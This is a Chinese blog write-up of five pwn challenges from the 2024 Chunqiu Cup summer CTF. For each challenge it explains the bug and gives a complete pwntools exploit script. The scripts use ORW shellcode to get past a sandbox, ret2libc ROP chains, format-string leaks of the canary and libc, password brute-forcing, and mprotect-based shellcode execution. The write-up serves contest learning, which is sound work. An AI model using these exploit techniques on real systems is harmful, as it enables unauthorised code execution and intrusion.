2024年春秋杯夏季赛pwn-Writeup

已于 2024-07-09 18:36:19 修改
阅读量1k 收藏 18
点赞数 15
文章标签: c# c语言
于 2024-07-09 18:30:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x528935893/article/details/140303695
版权

CTF阶段

1、Shuffled_Execution(一个沙箱)

我们分析代码发现首先申请一块可读可写的内存

我们发现还有一个加密的函数,但是其是用strlen来检查大小的,我们就可以用\x00来绕过

然后下面还有一个沙箱和一个函数一个跳段函数,会跳转到之前申请的可读可写内存中

我们查看沙箱,发现禁用了很多函数

利用思路:

1、我们通过orw来读取flag,但是这边open、read、write都被禁用,我们可用openat、mmap、writev来代替

2、我们在通过\x00来绕过加密函数

完整的exp

from pwn import *
from ctypes import *
context(os='linux', arch='amd64', log_level='debug')
elf = ELF("./pwn")
libc=cdll.LoadLibrary("./libc.so.6")
p = process('./pwn')
#p=remote('8.147.128.22', 13068)
shellcode='''
    mov ecx, 0x250
    mov rsi,0x1337070
    xor edi,edi
    mov rax,257
    xor rdx,rdx
    syscall  #openat
    
    mov rdi,0x1338000
    mov rsi,0x1000
    mov rdx,7
    mov r10,0x12
    mov r8,3
    xor r9,r9
    mov rax,9
    syscall
    
    mov rax,20
    mov rdi,1
    mov rsi,0x1337080
    mov rdx,1
    syscall   #writev
   
'''
print(shellcode)
p.recvuntil("The only chance to pass the entrance.\n")
print(hex(len(asm(shellcode))))
# gdb.attach(p,'b *$rebase(0x16EE)\nc')
# pause()
p.sendline(asm(shellcode).ljust(0x70,'\x00')+'/flag\x00'.ljust(0x10,b'\x00')+p64(0x1338000)+p64(30))
p.interactive(p)

2、stdout(设置了全缓冲区)

我们查看伪代码可以发现设置了全缓存区

然后main会溢出两个字节,vlun函数是然后我们可以溢出然后的长度

还有一个extend函数是为了让我们可以填满缓存区,然后将我们的内容打印出来,因为我们直接写地址区填满的本地是可打通的,但是远程会因为连接不稳定打不通,所以我们要通过这个函数将其填满

利用思路

1、我们通过extend函数填满缓存区,然后泄露libc的地址

2、然后我们就可以ret2libc拿到shell

注:也可以通过以下方式进行手动刷新缓冲区从而输出缓冲区中的内容:

  • 显式调用fflush函数 (这里我们没有泄露libc,所以我们没法拿到函数的地址)
  • 流被关闭(调用fclose)(这个我目前还没接触到)
  • 程序正常结束(调用exit)(这个我目前还没接触到)

完整的exp

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
elf = ELF("./pwn2")
libc=ELF("./libc-2.31.so")
p = process('./pwn2')
# p = remote('8.147.128.163',33425)
vlun=0x40125D
puts_plt=0x4010B0
puts_got=elf.got['puts']
pop_rdi=0x00000000004013d3 #: pop rdi ; ret
ret=0x000000000040101a #: ret
pay='a'*0x50+'b'*8+p64(0x40125D)
# gdb.attach(p,'b *0x40136D\nc')
# pause()
p.send(pay)
for i in range(3):
    pay = 'a' * 0x20 + 'b'*8 +p64(ret)+p64(0x401287)*54+p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vlun)
    p.send(pay)
libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['puts']
log.info('libc addr:' + hex(libc.address))
p.recv()
pop_rsi=0x00000000004013d1 #: pop rsi ; pop r15 ; ret
pop_rdx=0x0000000000142c92+libc.address #: pop rdx ; ret
one_gadget=[0xe3afe,0xe3b01,0xe3b04][2]+libc.address
pay='a'*0x20+p64(0)+p64(pop_rsi)+p64(0)*2+p64(pop_rdx)+p64(0)+p64(one_gadget)
p.send(pay)
p.interactive()

3、SavethePrincess

首先查看保护,发现保护全开

分析代码函数,发现只要两个函数,还有一个初始化函数,进入初始化函数,发现了调用了一个系统的随机数来来生成一段8位数的密码

我们再进入magic函数,发现我们要输入刚才生成密码,才能触发格式化字符串漏洞

我们发现buf和i是挨着的,再通gdb调试,他会将i给泄露出来,可以发现当我们输出的时候会将i给带出来,我们就可以通过这个来爆破密码

我们在进入Challenge函数,发现是一个大的栈溢出和一个沙盒,

我们这个这里可以用openat、mmap、write来打印flag,但是开启了栈不可执行,所以我们要通过mprotect函数修改栈的执行权限

利用思路:

1、首先我们通过i的泄露来爆破出密码,然后在通过格式化字符串泄露出canary、stack、libc的地址

2、我们首先要修改栈的权限,然后我们在写shellcode

完整的exp

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
elf=ELF('./SavethePrincess')
p= process('./SavethePrincess')
libc=ELF('./libc.so.6')
def cmd(idx):
    p.sendlineafter('>',str(idx))
cmd(1)
pay=''.ljust(10,'a')
p.sendlineafter('please input your password:',pay)
pwd = ""
realpwd = ""
s = "a"
for i in range(8):
    for j in range(26):
        # gdb.attach(p, '*b$rebase(0x17B9)\nc')
        # pause()
        cmd(1)
        pwd = pay.ljust(10,'a')
        p.sendlineafter('password:',pwd)
        p.recvuntil(pwd)
        idx=p.recv(1)
        if i+1 != struct.unpack('B',idx)[0]:
            s=chr(ord('b')+j)
            pay=realpwd+s
            continue
        realpwd+=s
        print realpwd
        break
cmd(1)
p.sendlineafter('please input your password: ',realpwd)

p.recvuntil('successfully, Embrace the power!!!\n')
# gdb.attach(p,'b *$rebase(0x166A)\nc')
# pause()
p.sendline('%10$p%15$p%13$p')

stack=(int(p.recv(14),16))
libc.address=int(p.recv(14),16)-0x29d90
canary=int(p.recv(18),16)
log.info('stack:'+ hex(stack))
log.info('libc_addr :'+ hex(libc.address))
log.info('canary :'+ hex(canary))
cmd(2)
shellcode=shellcraft.openat(-100,"/flag")
shellcode += '''
mov rax, 9          
mov r8, 0x3 
mov rdi, {}        
mov rsi, 0x100
mov rdx, 1          
mov r10, 0x02       
mov r9, 0   
syscall 
mov rsi, rax
mov rax, 1      
mov rdi, 1      
mov rdx, 0x100
sub rsi, 0x60    
syscall
'''.format((stack>>12)<<12)
pop_rdi = libc.address+ 0x000000000002a3e5
pop_rsi = libc.address+0x000000000002be51
pop_rax_rdx_rbx = libc.address+0x00000000000904a8
mprotect=libc.sym['mprotect']
pay = 'a'*0x38+p64(canary)+p64(0)
pay += p64(pop_rdi)+p64((stack>>12)<<12)+p64(pop_rsi)+p64(0x2000)+p64(pop_rax_rdx_rbx)+p64(10)+p64(7)+p64(0)+p64(mprotect)
pay += p64(stack+len(pay)-0x58)+asm(shellcode)
gdb.attach(p,'b *$rebase(0x170B)\nc')
pause()
print(hex(len(pay)))
p.sendlineafter('dragon!!',pay)
p.interactive()

注:struct.unpack是将字节流的数据进行转化为数值

用法:number,= struct.unpack(格式化字符串, 字节流的数据)

格式字符串可以包含多种类型,例如

  • c - 有符号的char(1字节)
  • b - 有符号的byte(1字节)
  • B - 无符号的byte(1字节)
  • h - 有符号的short(2字节)
  • H - 无符号的short(2字节)
  • i - 有符号的int(4字节)
  • I - 无符号的int(4字节)
  • l - 有符号的long(4字节,Python 2.x中是8字节)
  • L - 无符号的long(4字节,Python 2.x中是8字节)
  • q - 有符号的long long(8字节)
  • Q - 无符号的long long(8字节)
  • f - 浮点数(4字节)
  • d - 双精度浮点数(8字节)
  • s - 字符串(长度由后续数字指定)
  • p - 字符串,以空字符填充到指定长度

字节序(endian)可以是:

  • < - 小端(little-endian)
  • > - 大端(big-endian)
  • ! - 网络字节序(big-endian,与>相同)
  • = - 本机字节序(native)

awdp阶段

1、sspiiiiiil

我们查看代码,发现他有两个函数,一个输入,一个跳转

当我们输入3的时候就会进入sub_1CFB函数中,我们进入函数发现他会将我们输入的第一个字节的数取出来作为funcs_1B86函数的偏移,然后在a1 x02808的地方加一

我们查看funcs_1B86函数中,发现有好多函数的偏移,我们依次分析,发现了两个函数一个是system函数和一个funcs_1B86函数

system函数,我们发现system里面的参数是,通过取出我们存入的第三个字节数,在加上0x502,然后在读取a1中的数值

funcs_1B86函数,和上面的区别就是他没有限制我们输入的大小,所以我们可以读取到system函数的偏移

利用思路:

1、我们首先调用输入函数将我们所要构建的输入

2、我们第一个字的数为0xA,得到没有限制的funcs_1B86函数

3、然后第二个参数为0xC,就可以得到system函数的偏移

4、第三个参数,我们要算偏移,然后我们输入的第三个参数加上0x502,之后可以得到我们第四个字节的内容(我们通过观察,我们只要让最后的数值为0x104就可以拿到第四字节的)

所以我们要输入一个负数,然后存储的int64,为8字节的数,所以我们传入的数值为0xffffffffffffc02

完整的exp

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p= process('./pwn')
# p=remote("8.147.132.12:24531")
pay = p64(0xA)
pay += p64(0xC)
pay += p64(0xFFFFFFFFFFFFFC02)
pay += b"sh\x00"
def cmd(c):
    p.sendlineafter(b"choice:", str(c))
cmd(2)
p.send(pay)
gdb.attach(p,"b *$rebase(0x1D38)\nc")
pause()
cmd(3)
p.interactive()

2、simpleSys

首先我们查看开启了什么保护,发现开了pie和栈不可执行

然后我们再分析代码,发现有一个login函数和add函数

我们首先分析add函数,发现只有登录root用户才能执行,然后我们发现

我们进入sub_1217函数发现是一个循环读入的操作,并且还存在整数溢出,我们输入负数绕过

我们查看login函数,发现有root登录,我们查看密码的构成

我们进入sub_189C函数,发现他会在我们输入的数值最后加上一个\x00,我们就可以通过这个特性来绕过密码的判断,因为是通过strlen来判断长度的,

我们就可以通过溢出来覆盖byte_4050这个变量的末尾为\x00从而来绕过,首先我们查看list1的长度为48

,然后我们分析sub_189c函数,可知我们只要输入36个字符就可以将\x00覆盖到byte_4050的末尾

利用思路:

1、首先我们通过\x00来绕过root的登录

2、我们进入add函数发现格式化字符串,我们通过溢出来拿到程序的基地址

3、然后我们就是ret2libc,泄露libc,然后写rop

完整的exp

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
elf=ELF('./main')
p= process('./main')
libc=ELF('./libc.so.6')
def cmd(idx):
    p.sendlineafter('Enter your choice: ',str(idx))
def lonin(user,passwd):
    cmd(2)
    p.sendlineafter('username: ',str(user))
    p.sendlineafter('password: ',str(passwd))
user='root'
passwd='a'*36
gdb.attach(p,"b *$rebase(0x1867)\nc")
pause()
lonin(user,passwd)
cmd(3)
pay='a'*0x68
p.sendlineafter('input length: ',str(-1))
p.sendline(pay)
p.recvuntil('a'*0x68)
stack=u64(p.recv(6).ljust(8,'\x00'))-0x187d
log.info('stack :' + hex(stack))
p.sendlineafter('[y/n]','n')
p.sendlineafter('input length: ',str(-1))
pop_rdi=0x0000000000001751+stack #: pop rdi ; ret
ret=0x000000000000101a+stack #: ret
put_got=elf.got['puts']+stack
put_plt=stack+0x10F0
pay='a'*0x68+p64(pop_rdi)+p64(put_got)+p64(put_plt)+p64(stack+0x146A)
# gdb.attach(p,'b *$rebase(0x1566)\nc')
# pause()
p.sendline(pay)
p.sendlineafter('[y/n]','y')
libc.address=u64(p.recvuntil('\x7f').ljust(8,'\x00'))-libc.sym['puts']
system=libc.sym['system']
bin_sh=libc.search('/bin/sh\x00').next()
log.info('libc_base : ' + hex(libc.address))
log.info('system : ' + hex(system))
log.info('bin_sh : ' + hex(bin_sh))
pay='a'*0x68+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)
p.sendlineafter('input length: ',str(-1))
p.sendline(pay)
p.sendlineafter('[y/n]','y')
p.interactive()
jacker0_1
关注
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
build-an-efficient-pwn-environment:如何在2020建立高效的Pwn开发环境
05-26
在2020建立高效的Pwn开发环境 多以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
2024春秋网络安夏季-PWN
llovewuzhengzi的博客
07-10 1190
gadget不够,用csu里的,通过rop的一个特殊gadget修改got表,然后利用gadget满足onegadget的条件,最后调用覆盖got表。没有时间限制,也没有次数限制,可以爆破,26*7次,然后触发格式化字符串泄露canary和libc地址,然后溢出rop绕过沙箱。然后写入shellcode即可(没有栈,通过mmap分配的内容作为栈,进而存储字符串和iovec这个结构体)函数在 Linux 和类 Unix 系统中用于从文件描述符指定的文件中读取数据,但与普通的。如果读取失败,函数将返回。
2024春秋冬季-部分题Wp_勒索流量ichunqiu,2024最新程序员深度学习
2401_84150530的博客
04-09 654
continue。
xyctf Pwn WP
qq_74026216的博客
04-28 966
利用jmp 短跳转 连接shellcode,用3个pop rsi 把栈中的0x114514000赋值给rsi ,syscall调用read写入sh。libc-2.35 add 存在溢出,将堆指针放在下一个chunk的prev_size中 ,chunk_list 指针free后未置0。思路:伪造chunk 造成堆块重叠,tcache bin attack 分配chunk到gift为system(/bin/sh)静态链接 ,栈溢出 ,mprotect改权限,打shellcode。
2023春秋网络安冬季 Writeup
末初的CSDN博客
01-22 5483
2023春秋网络安冬季 Writeup
2024第一届帕鲁应急响应挑战-Writeup
qq_58833765的博客
04-22 2679
直接开始解密发现这是一条付费记录(话不多说直接购买),没办法,只能遍历md5看能不能碰运气,最后发现文件名就是他的md5值的前半段。登录PC02查看到很多非系统用户,除去公司员工用户(中文名),系统用户,判断其余用户可能为恶意用户。通过堡垒机查看webserver会话记录分析,该ip请求繁多,时间段较长,分析可能为攻击ip。直接把附件exe拖到ida分析动态调试,下断点,看验证码,直接把验证改了,基操,ez~通过查看堡垒机会话记录的监控,查看攻击者视角,得出钓鱼文件。
2024春秋网络安夏季
qq_67760645的博客
07-07 1109
以下这些均是来自本人以及团队内大佬的解题思路,也纯属做一个分享。如果哪里做的不好,希望师傅们能多多指教。
2017湖湘 pwn100-writeup
aptx4869_li的博客
12-22 1156
2017湖湘 pwn100-writeup 这是本人第一次做出来pwn的题可能有些地方显得比较笨,但尽量把自己所想的每一步都描述清楚。不足之处请批评指正。
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3225
前言 开始刷一刷Buuctf的PWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
2020 蓝帽线下PWN WriteUp .pdf
09-05
本文主要涉及的是网络安领域的Pwn(利用漏洞攻防)技术,具体是针对2020蓝帽线下中的一个Pwn题目进行的WriteUp(解题报告)。Pwn类题目通常涉及到缓冲区溢出、格式字符串漏洞、整数溢出等,目标是通过编写...
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安pwn技术的竞题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安问题。我们将围绕这个主题...
C#中的委托
愿你历尽千帆,归来仍是少年。
09-08 1167
这里T是泛型参数,表示任何类型的对象。
原始输入解析XBOX手柄
最新发布
FlameCyclone的博客
09-10 336
原始输入解析XBOx手柄输入
C#索引器(Indexer)
nazabanne的博客
09-07 468
索引器(Indexer)允许一个对象可以像数组一样使用下标的方式来访问.当为类定义一个索引器时,该类的行为就会像一个虚拟数组(virtual array) 一样.可以使用数组访问运算符[]来访问该类的成员.
C#生态园】提升性能效率:C#异步I/O库详尽比较和应用指南
记录我的学习历程
09-10 1373
本文将逐个介绍以上列出的六个C#异步I/O库,每个库都包括简介、核心功能、使用场景、安装与配置以及API概览等部分。通过对这些内容的介绍,读者可以更好地理解每个库的作用和优势,为实际应用提供参考。
EmguCV学习笔记 C# 11.1 DnnInvoke类
UruseiBest 的技术专栏
09-10 1065
EmguCV是一个基于OpenCV的开源免费的跨平台计算机视觉库,它向C#和VB.NET开发者提供了OpenCV库的大部分功能。教程配套文件及相关说明获得pdf教程和代码。
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值